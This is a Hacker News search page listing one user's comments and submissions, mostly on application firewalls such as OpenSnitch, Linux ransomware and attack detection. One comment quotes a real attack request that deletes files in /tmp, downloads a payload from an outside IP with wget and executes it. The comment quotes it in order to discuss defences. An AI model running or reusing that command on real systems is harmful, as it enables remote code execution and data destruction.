Y
HN Search
Hacker News Search
new
|
comments
|
top
|
jobs
gus_
searching PlanetScale…
1.
▲
2.
▲
3.
▲
4.
▲
5.
▲
6.
▲
7 ms
·
31.
▲
by
gus_
1y ago
I haven't taken a look at the malware, but it seems to download files from the Internet so it should have warned you to allow/deny the outbound connections. It'd be nice to test it with a sample of aur package/malware.
32.
▲
by
gus_
1y ago
Unfortunately that is not entirely true. For example, when closing firefox on OpenSUSE Leap 15.6, "pingsender" is launched to collect telemetry: https://imgur.com/a/k3Nnbbj It has been there for years. It is
33.
▲
by
gus_
2y ago
The campaign is using Go packages just as a mechanism to download a ransomware for Linux systems, and it specifically checks if the Documents/ directory exists for the current user. If it doesn't exist it does nothing. That's
34.
▲
Ransomware malware targeting Linux Desktop users spotted in the wild
(github.com)
12 points
by
gus_
2y ago
|
2 comments
35.
▲
by
gus_
2y ago
The article misses one critical point in these attacks: practically all these attacks require downloading remote files to the server once they gain access, using curl, wget or bash. Restricting arbitrary downloads from curl, wget or bash (o
36.
▲
by
gus_
2y ago
was this the malicious plugin? (from the reddit thread [0]) https://github.com/jabberplugins/pidgin-screenshare The plugin uses a reverse-tunneling SocketIO-server (to bypass NAT) on https://jabberplugin
37.
▲
by
gus_
3y ago
An EDR would have detected an inbound connection to port 22. Then it'd have detected the attacker's activity (opened files, executed commands, etc) If the EDR is capable of intercepting the forks, clone () execves, open (), etc, t
38.
▲
by
gus_
3y ago
with [0] you can disable network access by application. [0] https://github.com/TrackerControl/tracker-control-android
39.
▲
by
gus_
3y ago
> GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.6.255.231/jaws;sh+/tmp/jaws in the case of a successful attack, some questions to ask could be: - why did they manage to use wget? - why {apache,nginx,postfix,exim,sendmail
40.
▲
Ransomware cyberattack hits Barcelona's Hospital Clínic
(elnacional.cat)
1 points
by
gus_
4y ago
|
0 comments
41.
▲
by
gus_
4y ago
Could you post an example of using SELinux to allow/deny connections per application/ip/domain/port/uid/application path in an interactive manner?
42.
▲
by
gus_
4y ago
OoenSnitch can, but it's not implemented O:) (only as a PoC) But does it have any sense? Usually you block inbound connections, allowing only certain services. If a rogue process starts listening on a local port, you could display a wa
43.
▲
by
gus_
4y ago
> Besides, why would I want to Wireshark my browser? https://github.com/gustavo-iniguez-goya/opensnitch/issues/21 https://nullsweep.com/why-is-this-website-port-scanning-me/ https:&#
44.
▲
by
gus_
4y ago
unfortunately malicious lkms and userland rootkits can hide processes/connections from lsof/netstat https://github.com/gianlucaborello/libprocesshider
45.
▲
by
gus_
5y ago
> I would not consider any of them production datacenter ready. Could you explain why? Any experience/benchmark to share? By the way, [1] has a GUI, but you can install only the daemon on the servers. Limiting to what IPs/doma
46.
▲
by
gus_
5y ago
They have been feeding the dogs for some days now, so the dogs are used to the drones to get the food. Hopefully they will catch them effortlessly.
47.
▲
by
gus_
5y ago
context: https://mobile.twitter.com/ptrcnull/status/14274494016357457...
48.
▲
Getting GPLv2 source code from a company – in person
(reddit.com)
4 points
by
gus_
5y ago
|
1 comments
49.
▲
by
gus_
6y ago
I think you haven't tested last versions. GUI is not GTK, but Qt. > If you're hoping to use the machine purely from the CLI (like, when sshing into your work machine) it won't work well. There's no cli tool published
50.
▲
by
gus_
6y ago
https://github.com/evilsocket/opensnitch However, if you allow everything to 80/443, the extensions would still be able to connect to their servers. Maybe the browsers should add the ability to allow/deny con
51.
▲
by
gus_
6y ago
Universitat Politècnica de València researchers develop a rapid test, based on DVD technologies, that allows detecting COVID-19 for two euros in half an hour. https://www.ara.cat/en/the-Polytechnic-University-Valencia-d
52.
▲
Researchers develop a Covid-19 rapid test based on DVD technologies
(upv.es)
1 points
by
gus_
6y ago
|
1 comments
53.
▲
by
gus_
6y ago
did you try tinysnitch [0], opensnitch fork [1] or Douane [2]? [1] works pretty well for me. [0] https://github.com/nathants/tinysnitch [1] https://github.com/gustavo-iniguez-goya/opensnitch [2]
54.
▲
WatchGuard to Acquire Panda Security
(watchguard.com)
15 points
by
gus_
7y ago
|
2 comments
55.
▲
by
gus_
7y ago
> Seems like this is probably a useful tool to figure out programs that are talking to servers when they're expected to be silent Absolutely. It's funny to see that whenever you dis/connect a USB device there're broad
56.
▲
by
gus_
7y ago
Many of the PRs have been added here, plus some other ideas and improvements: https://github.com/gustavo-iniguez-goya/opensnitch
57.
▲
by
gus_
7y ago
I've been always fascinated with sunrises and sunsets, so I built a picam to take timelapses: https://hackaday.io/project/28694-yet-another-raspberry-pica... youtube channel: https://www.youtube.com